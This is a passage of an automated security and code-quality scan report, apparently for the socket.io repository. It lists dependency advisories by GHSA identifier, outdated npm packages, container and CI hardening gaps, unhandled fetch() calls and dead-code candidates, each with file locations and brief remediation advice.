follow-redirects' Proxy-Authorization header kept across hosts
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 follow-redirects: GHSA-jchw-25xp-jwwc
Follow Redirects improperly handles URLs in the url.parse() function
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 2 occurrences follow-redirects: GHSA-r4q5-vmmm-2653
follow-redirects leaks Custom Authentication Headers to Cross-Domain Redirect Targets
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
medium Security checks software dependencies conf 0.88 http-proxy-middleware: GHSA-4www-5p9h-95mh
http-proxy-middleware can call writeBody twice because "else if" is not used
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 http-proxy-middleware: GHSA-9gqv-wp59-fq42
http-proxy-middleware allows fixRequestBody to proceed even if bodyParser has failed
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 ip-address: GHSA-v2v4-37r5-5v8g
ip-address has XSS in Address6 HTML-emitting methods
package-lock.json
medium Security checks software dependencies conf 0.88 2 occurrences js-yaml: GHSA-mh29-5h37-fv8m
js-yaml has prototype pollution in merge (<<)
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
medium Security checks software dependencies conf 0.88 2 occurrences lodash: GHSA-f23m-r3pf-42rh
lodash vulnerable to Prototype Pollution via array path bypass in `_.unset` and `_.omit`
2 files, 2 locations
examples/ReactNativeExample/yarn.lock
package-lock.json
medium Security checks software dependencies conf 0.88 2 occurrences lodash: GHSA-xxjr-mmjv-4gpg
Lodash has Prototype Pollution Vulnerability in `_.unset` and `_.omit` functions
2 files, 2 locations
examples/ReactNativeExample/yarn.lock
package-lock.json
medium Security checks software dependencies conf 0.88 micromatch: GHSA-952p-6rrq-rcjv
Regular Expression Denial of Service (ReDoS) in micromatch
examples/ReactNativeExample/yarn.lock
medium Security checks software dependencies conf 0.88 minimist: GHSA-vh95-rmgr-6w4m
Prototype Pollution in minimist
packages/engine.io/examples/latency/package-lock.json
medium Security checks software dependencies conf 0.88 ms: GHSA-w9mr-4mfr-499f
Vercel ms Inefficient Regular Expression Complexity vulnerability
packages/engine.io/examples/latency/package-lock.json
medium Security checks software dependencies conf 0.88 2 occurrences node-forge: GHSA-65ch-62r8-g69g
node-forge is vulnerable to ASN.1 OID Integer Truncation
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
medium Security checks software dependencies conf 0.90 npm package `@rollup/plugin-alias` is 1 major version(s) behind (5.1.0 -> 6.0.0)
`@rollup/plugin-alias` is pinned/resolved at 5.1.0 but the latest stable release on the npm registry is 6.0.0 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs rais…
package.json
medium Security checks software dependencies conf 0.90 npm package `@rollup/plugin-babel` is 1 major version(s) behind (6.0.4 -> 7.1.0)
`@rollup/plugin-babel` is pinned/resolved at 6.0.4 but the latest stable release on the npm registry is 7.1.0 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs rais…
package.json
medium Security checks software dependencies conf 0.90 npm package `@rollup/plugin-commonjs` is 3 major version(s) behind (26.0.1 -> 29.0.3)
`@rollup/plugin-commonjs` is pinned/resolved at 26.0.1 but the latest stable release on the npm registry is 29.0.3 (3 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs…
package.json
medium Security checks software dependencies conf 0.90 npm package `@rollup/plugin-node-resolve` is 1 major version(s) behind (15.2.3 -> 16.0.3)
`@rollup/plugin-node-resolve` is pinned/resolved at 15.2.3 but the latest stable release on the npm registry is 16.0.3 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update…
package.json
medium Security checks software dependencies conf 0.90 npm package `@sinonjs/fake-timers` is 4 major version(s) behind (11.2.2 -> 15.4.0)
`@sinonjs/fake-timers` is pinned/resolved at 11.2.2 but the latest stable release on the npm registry is 15.4.0 (4 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs ra…
package.json
medium Security checks software dependencies conf 0.90 npm package `@types/sinonjs__fake-timers` is 7 major version(s) behind (8.1.5 -> 15.0.1)
`@types/sinonjs__fake-timers` is pinned/resolved at 8.1.5 but the latest stable release on the npm registry is 15.0.1 (7 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update …
package.json
medium Security checks software dependencies conf 0.90 3 occurrences npm package `@wdio/sauce-service` is 1 major version(s) behind (8.46.0 -> 9.27.2)
`@wdio/sauce-service` is pinned/resolved at 8.46.0 but the latest stable release on the npm registry is 9.27.2 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs rai…
3 occurrences
package.json (3 hits)
medium Security checks software dependencies conf 0.90 npm package `@wdio/spec-reporter` is 1 major version(s) behind (8.39.0 -> 9.27.2)
`@wdio/spec-reporter` is pinned/resolved at 8.39.0 but the latest stable release on the npm registry is 9.27.2 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs rai…
package.json
medium Security checks software dependencies conf 0.90 npm package `babel-loader` is 1 major version(s) behind (9.1.3 -> 10.1.1)
`babel-loader` is pinned/resolved at 9.1.3 but the latest stable release on the npm registry is 10.1.1 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
medium Security checks software dependencies conf 0.90 npm package `cookie` is 1 major version(s) behind (0.7.2 -> 1.1.1)
`cookie` is pinned/resolved at 0.7.2 but the latest stable release on the npm registry is 1.1.1 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
medium Security checks software dependencies conf 0.90 npm package `eiows` is 2 major version(s) behind (7.1.0 -> 9.2.0)
`eiows` is pinned/resolved at 7.1.0 but the latest stable release on the npm registry is 9.2.0 (2 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
medium Security checks software dependencies conf 0.90 npm package `express` is 1 major version(s) behind (4.21.2 -> 5.2.1)
`express` is pinned/resolved at 4.21.2 but the latest stable release on the npm registry is 5.2.1 (1 major version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
medium Security checks software dependencies conf 0.88 2 occurrences parseuri: GHSA-6fx8-h7jm-663j
parse-uri Regular expression Denial of Service (ReDoS)
2 files, 2 locations
package-lock.json
packages/engine.io/examples/latency/package-lock.json
medium Security checks software dependencies conf 0.88 2 occurrences picomatch: GHSA-3v7f-55p6-f55p
Picomatch: Method Injection in POSIX Character Classes causes incorrect Glob Matching
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
medium Security checks software dependencies conf 0.88 postcss: GHSA-7fh5-64p2-3v2j
PostCSS line return parsing error
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 postcss: GHSA-qx2v-qp2m-jg93
PostCSS has XSS via Unescaped </style> in its CSS Stringify Output
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks quality Quality conf 0.78 Public web service has no security.txt
security.txt gives researchers and customers a safe disclosure channel. Public web apps and APIs should publish it under /.well-known/security.txt.
.well-known/security.txt
medium Security checks software dependencies conf 0.88 2 occurrences qs: GHSA-6rw7-vpxm-498p
qs's arrayLimit bypass in its bracket notation allows DoS via memory exhaustion
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
medium Security checks software dependencies conf 0.88 qs: GHSA-q8mj-m7cp-5q26
qs has a remotely triggerable DoS: qs.stringify crashes with TypeError on null/undefined entries in comma-format arrays when encodeValuesOnly is set
package-lock.json
medium Security checks software dependencies conf 0.88 2 occurrences serialize-javascript: GHSA-qj8w-gfj5-8c6v
Serialize JavaScript has CPU Exhaustion Denial of Service via crafted array-like objects
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
medium Security checks software dependencies conf 0.88 socket.io-parser: GHSA-cqmj-92xf-r6r9
Insufficient validation when decoding a Socket.IO packet
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 socket.io: GHSA-25hc-qcg6-38wj
socket.io has an unhandled 'error' event
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 tough-cookie: GHSA-72xf-g2v4-qvf3
tough-cookie Prototype Pollution vulnerability
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 2 occurrences uuid: GHSA-w5hq-g745-h8pq
uuid: Missing buffer bounds check in v3/v5/v6 when buf is provided
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
medium Security checks software dependencies conf 0.88 webpack-dev-server: GHSA-4v9v-hfq4-rm2v
webpack-dev-server users' source code may be stolen when they access a malicious web site
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 webpack-dev-server: GHSA-79cf-xcqc-c78w
webpack-dev-server vulnerable to cross-origin source code exposure on non-HTTPS origins
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 webpack-dev-server: GHSA-9jgg-88mc-972h
webpack-dev-server users' source code may be stolen when they access a malicious web site with non-Chromium based browser
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 webpack: GHSA-4vvj-4cpr-p986
Webpack's AutoPublicPathRuntimeModule has a DOM Clobbering Gadget that leads to XSS
examples/basic-crud-application/vue-client/yarn.lock
medium Security checks software dependencies conf 0.88 word-wrap: GHSA-j8xg-fqg3-53r7
word-wrap vulnerable to Regular Expression Denial of Service
examples/create-react-app-example/yarn.lock
medium Security checks software dependencies conf 0.88 ws: GHSA-58qx-3vcg-4xpx
ws: Uninitialized memory disclosure
examples/ReactNativeExample/yarn.lock
medium Security checks software dependencies conf 0.88 yaml: GHSA-48c2-rrv3-qjmp
yaml is vulnerable to Stack Overflow via deeply nested YAML collections
examples/ReactNativeExample/yarn.lock
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — docs/engine.io-protocol/v3-test-suite/test-suite.js:40
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — docs/engine.io-protocol/v4-test-suite/test-suite.js:52
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — docs/socket.io-protocol/v5-test-suite/test-suite.js:71
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — examples/create-react-app-example/src/serviceWorker.js:103
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/engine.io-client/lib/transports/polling-fetch.ts:4
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/engine.io-client/test/support/env.js:34
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/engine.io/test/common.js:80
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/engine.io/test/server.js:1471
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/socket.io-cluster-engine/test/cluster.ts:47
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/socket.io-cluster-engine/test/in-memory.ts:72
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/socket.io-cluster-engine/test/redis.ts:76
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/socket.io-cluster-engine/test/util.ts:12
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph quality Integrity conf 1.00 `fetch()` without try/.catch or AbortSignal — packages/socket.io/client-dist/socket.io.esm.min.js:6
Bare `fetch(...)` will throw an unhandled rejection on network failure. Wrap in try/catch, attach a `.catch(...)`, or pass an AbortSignal with a timeout.
runtime safetyRobustness
medium System graph hardware Security conf 1.00 Dockerfile runs as root: examples/cluster-haproxy/server/Dockerfile
No non-root USER set. Containers running as root expand the blast radius of any vulnerability inside the image.
Container
medium System graph hardware Security conf 1.00 Dockerfile runs as root: examples/cluster-httpd/server/Dockerfile
No non-root USER set. Containers running as root expand the blast radius of any vulnerability inside the image.
Container
medium System graph hardware Security conf 1.00 Dockerfile runs as root: examples/cluster-nginx/client/Dockerfile
No non-root USER set. Containers running as root expand the blast radius of any vulnerability inside the image.
Container
medium System graph hardware Security conf 1.00 Dockerfile runs as root: examples/cluster-nginx/server/Dockerfile
No non-root USER set. Containers running as root expand the blast radius of any vulnerability inside the image.
Container
medium System graph hardware Security conf 1.00 Dockerfile runs as root: examples/cluster-traefik/server/Dockerfile
No non-root USER set. Containers running as root expand the blast radius of any vulnerability inside the image.
Container
medium System graph cicd CI/CD security conf 1.00 GitHub Actions workflow grants broad write permissions
CI tokens with write permissions increase blast radius when an action, dependency, or PR workflow is compromised. Prefer job-level least-privilege permissions.
.github/workflows/publish.yml CI/CD securitySupply chainGithub actions
low Security checks software dependencies conf 0.88 @tootallnate/once: GHSA-vpq2-c234-7xj6
@tootallnate/once vulnerable to Incorrect Control Flow Scoping
examples/create-react-app-example/yarn.lock
low Security checks security auth conf 0.76 [AUC005] No authorization-focused tests detected: No test files with common authorization, ownership, 403, admin, or super_admin assertions were found.
No test files with common authorization, ownership, 403, admin, or super_admin assertions were found.
low Security checks software dependencies conf 0.88 axios: GHSA-xhjh-pmcv-23jw
Axios: Null Byte Injection via Reverse-Encoding in AxiosURLSearchParams
package-lock.json
high Security checks cicd CI/CD security conf 0.56 17 occurrences Compose service does not declare a runtime user
If the image does not define USER internally, this service may run as root.
5 files, 17 locations
examples/cluster-haproxy/docker-compose.yml:1, 13, 22, 31, 40 (5 hits)
examples/cluster-httpd/docker-compose.yml:1, 13, 22, 31, 40 (5 hits)
examples/cluster-nginx/docker-compose.yml:13, 22, 31, 40, 49 (5 hits)
examples/cluster-traefik/docker-compose.yml:14
packages/socket.io-redis-streams-emitter/compose.yaml:11
CI/CD securitycontainers
high Security checks cicd CI/CD security conf 0.62 17 occurrences Compose service lacks no-new-privileges hardening
no-new-privileges prevents processes from gaining additional privileges through setuid binaries or file capabilities.
5 files, 17 locations
examples/cluster-haproxy/docker-compose.yml:1, 13, 22, 31, 40 (5 hits)
examples/cluster-httpd/docker-compose.yml:1, 13, 22, 31, 40 (5 hits)
examples/cluster-nginx/docker-compose.yml:13, 22, 31, 40, 49 (5 hits)
examples/cluster-traefik/docker-compose.yml:14
packages/socket.io-redis-streams-emitter/compose.yaml:11
CI/CD securitycontainers
low Security checks software dependencies conf 0.88 cookie: GHSA-pxg6-pf52-xh8x
cookie accepts cookie name, path, and domain with out of bounds characters
examples/basic-crud-application/vue-client/yarn.lock
low Security checks cicd CI/CD security conf 0.72 9 occurrences Database service has no healthcheck
Compose starts dependent containers in dependency order, but it does not wait for a database to be ready unless a healthcheck is defined and dependents use service_healthy.
8 files, 9 locations
packages/socket.io-redis-streams-emitter/compose.yaml:1, 6 (2 hits)
examples/cluster-engine-redis/compose.yaml:1
examples/cluster-haproxy/docker-compose.yml:49
examples/cluster-httpd/docker-compose.yml:49
examples/cluster-nginx/docker-compose.yml:54
examples/cluster-traefik/docker-compose.yml:23
examples/private-messaging/server/docker-compose.yml:3
packages/socket.io-cluster-engine/compose.yaml:1
CI/CD securitycontainers
low Security checks software dependencies conf 0.88 debug: GHSA-gxpj-cx7g-858c
Regular Expression Denial of Service in debug
packages/engine.io/examples/latency/package-lock.json
low Security checks software dependencies conf 0.88 2 occurrences diff: GHSA-73rr-hh4g-fpgx
jsdiff has a Denial of Service vulnerability in parsePatch and applyPatch
2 files, 2 locations
docs/engine.io-protocol/v3-test-suite/package-lock.json
package-lock.json
low Security checks quality Quality conf 0.60 14 occurrences Duplicated implementation block across source files
Duplicate implementation blocks are maintenance debt. Keep them visible, but they are not a high-severity defect unless the duplicated logic is security-sensitive or drifting.
12 files, 13 locations
packages/socket.io-client/support/rollup.config.umd.js:13, 42 (2 hits)
packages/engine.io-client/support/rollup.config.umd.js:43
packages/engine.io-parser/lib/decodePacket.ts:8
packages/engine.io/lib/transports/polling.ts:124
packages/socket.io-client/support/bundle-size.js:12
packages/socket.io-cluster-engine/lib/redis.ts:76
packages/socket.io-component-emitter/lib/esm/index.js:2
packages/socket.io-parser/wdio.conf.js:7
duplicationquality
low Security checks software dependencies conf 0.88 express: GHSA-qw6h-vgh9-j6wx
express vulnerable to XSS via response.redirect()
examples/basic-crud-application/vue-client/yarn.lock
low Security checks software dependencies conf 0.88 fast-xml-parser: GHSA-fj3w-jwp8-x2g3
fast-xml-parser has stack overflow in XMLBuilder with preserveOrder
examples/ReactNativeExample/yarn.lock
low Security checks software dependencies conf 0.90 3 occurrences npm package `@babel/preset-env` is minor version(s) behind (7.24.7 -> 7.29.7)
`@babel/preset-env` is pinned/resolved at 7.24.7 but the latest stable release on the npm registry is 7.29.7 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
3 occurrences
package.json (3 hits)
low Security checks software dependencies conf 0.90 npm package `@babel/register` is minor version(s) behind (7.24.6 -> 7.29.7)
`@babel/register` is pinned/resolved at 7.24.6 but the latest stable release on the npm registry is 7.29.7 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
low Security checks software dependencies conf 0.90 2 occurrences npm package `@fails-components/webtransport-transport-http3-quiche` is minor version(s) behind (1.5.1 -> 1.6.3)
`@fails-components/webtransport-transport-http3-quiche` is pinned/resolved at 1.5.1 but the latest stable release on the npm registry is 1.6.3 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dep…
2 occurrences
package.json (2 hits)
low Security checks software dependencies conf 0.90 npm package `@socket.io/postgres-adapter` is minor version(s) behind (0.1.1 -> 0.5.0)
`@socket.io/postgres-adapter` is pinned/resolved at 0.1.1 but the latest stable release on the npm registry is 0.5.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs…
package.json
low Security checks software dependencies conf 0.90 npm package `@socket.io/redis-streams-adapter` is minor version(s) behind (0.2.2 -> 0.3.1)
`@socket.io/redis-streams-adapter` is pinned/resolved at 0.2.2 but the latest stable release on the npm registry is 0.3.1 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-updat…
package.json
low Security checks software dependencies conf 0.90 npm package `@types/pg` is minor version(s) behind (8.15.5 -> 8.20.0)
`@types/pg` is pinned/resolved at 8.15.5 but the latest stable release on the npm registry is 8.20.0 (minor version(s) behind). Outdated dependencies accumulate unpatched bugs and make future security upgrades harder. This is the version-currency signal Dependabot version-update PRs raise.
package.json
low Security checks software dependencies conf 0.88 on-headers: GHSA-76c9-3jph-rj3q
on-headers is vulnerable to http response header manipulation
examples/ReactNativeExample/yarn.lock
low Security checks software dependencies conf 0.88 2 occurrences qs: GHSA-w7fw-mjwx-w883
qs's arrayLimit bypass in comma parsing allows denial of service
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
low Security checks quality Quality conf 0.74 robots.txt does not advertise a sitemap
Sitemap directives in robots.txt help crawlers and AI agents find the canonical public URL inventory quickly.
examples/create-react-app-example/public/robots.txt
low Security checks software dependencies conf 0.88 send: GHSA-m6fv-jmcg-4jfg
send vulnerable to template injection that can lead to XSS
examples/ReactNativeExample/yarn.lock
low Security checks software dependencies conf 0.88 serve-static: GHSA-cm22-4g7w-348p
serve-static vulnerable to template injection that can lead to XSS
examples/ReactNativeExample/yarn.lock
low Security checks software dependencies conf 0.88 tmp: GHSA-52f5-9888-hmc6
tmp allows arbitrary temporary file / directory write via symbolic link `dir` parameter
package-lock.json
low Security checks software dependencies conf 0.88 2 occurrences webpack: GHSA-38r7-794h-5758
webpack buildHttp HttpUriPlugin allowedUris bypass via HTTP redirects → SSRF + cache persistence
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
low Security checks software dependencies conf 0.88 2 occurrences webpack: GHSA-8fgc-7cc6-rx7x
webpack buildHttp: allowedUris allow-list bypass via URL userinfo (@) leading to build-time SSRF behavior
2 files, 2 locations
examples/basic-crud-application/vue-client/yarn.lock
package-lock.json
low System graph quality Maintenance conf 1.00 132 TODO/FIXME markers
High count of TODO/FIXME/HACK markers — track them as issues so they're not forgotten.
low System graph hardware Coverage conf 1.00 Containers defined but no K8s/orchestration manifest found
Repo has Dockerfiles/compose but no Kubernetes/Nomad manifests. If the target deployment is K8s, the manifests may live in a separate ops repo.
Deployment
low System graph hardware Supply chain conf 1.00 5 occurrences Docker base image is tag-pinned but not digest-pinned: node:14-alpine
Container tags can be retagged upstream. Pin production base images to a reviewed digest (`image@sha256:...`) when reproducibility and supply-chain integrity matter.
5 files, 5 locations
examples/cluster-haproxy/server/Dockerfile:1
examples/cluster-httpd/server/Dockerfile:1
examples/cluster-nginx/client/Dockerfile:1
examples/cluster-nginx/server/Dockerfile:1
examples/cluster-traefik/server/Dockerfile:1
containersPinned dependencies
low System graph software Dead code candidate conf 1.00 File has no detected symbols: docs/engine.io-protocol/v3-test-suite/node-imports.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: docs/engine.io-protocol/v4-test-suite/node-imports.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: docs/socket.io-protocol/v5-test-suite/node-imports.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io-client/test/arraybuffer/polling.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io-client/test/arraybuffer/ws.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io-client/test/binary-fallback.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io-client/test/engine.io-client.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io-client/test/fixtures/unref.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io-client/test/parseuri.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io-client/test/socket.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io-client/test/transport.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io-client/test/util.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io-client/test/xmlhttprequest.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io-parser/lib/commons.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io-parser/test/browser.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io-parser/test/node.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io/examples/memory-usage-webtransport/client.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io/examples/memory-usage/client.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io/test/fixtures/server-close-upgraded.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io/test/fixtures/server-close-upgrading.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io/test/fixtures/server-close.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io/test/middlewares.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/engine.io/test/parser.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/babel.config.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/lib/browser-entrypoint.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/support/rollup.config.esm.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/support/rollup.config.umd.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/support/rollup.config.umd.msgpack.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/test/connection-state-recovery.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/test/fixtures/no-unref.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/test/fixtures/unref-during-reconnection.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/test/fixtures/unref-polling-only.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/test/fixtures/unref-websocket-only.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/test/fixtures/unref.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/test/retry.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/test/support/hooks.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/test/typed-events.test-d.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/test/url.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-client/wdio.conf.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-cluster-engine/test/redis.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-cluster-engine/test/worker.js
Source file with no class/function declarations — possible config, dead code, or scratch file.
low System graph software Dead code candidate conf 1.00 File has no detected symbols: packages/socket.io-postgres-emitter/lib/typed-events.ts
Source file with no class/function declarations — possible config, dead code, or scratch file.
